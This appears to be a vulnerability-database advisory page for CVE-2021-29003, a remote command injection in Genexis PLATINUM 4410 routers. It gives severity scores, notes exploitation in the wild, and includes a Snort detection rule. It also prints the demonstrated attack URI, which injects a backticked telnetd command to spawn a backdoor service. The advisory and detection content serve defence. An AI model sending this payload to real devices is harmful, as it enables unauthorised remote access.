cbcvebase.
CVE-2021-29003
published 2021-04-13

CVE-2021-29003: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as…

PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
45.42%
98.6th percentile
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.

Affected

1 ranges
VendorProductVersion rangeFixed in
genexisplatinum_4410_firmware

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60
path/sys_config_valid.xgi
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Genexis PLATINUM 4410 Command Injection Inbound (CVE-2021-29003)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/sys_config_valid.xgi?exeshell="; fast_pattern; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7C|\x24)/R"; reference:cve,2021-29003; classtype:attempted-admin; sid:2033758; rev:1; metadata:attack_target Server, created_at 2021_08_22, cve CVE_2021_29003, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_22, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect HTTP GET requests targeting /sys_config_valid.xgi with the 'exeshell' query parameter, which is the injection point for shell metacharacter-based RCE.
  • After matching the URI, inspect the value following 'exeshell=' for shell metacharacters: semicolon (0x3b), newline (0x0a), ampersand (0x26), backtick (0x60), pipe (0x7C), or dollar sign (0x24).
  • The demonstrated payload uses URL-encoded backticks to wrap a command (e.g., telnetd) for execution, resulting in a persistent backdoor service being spawned on the device.
  • ·The vulnerability is confirmed only on a specific firmware version; other versions are not confirmed affected.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.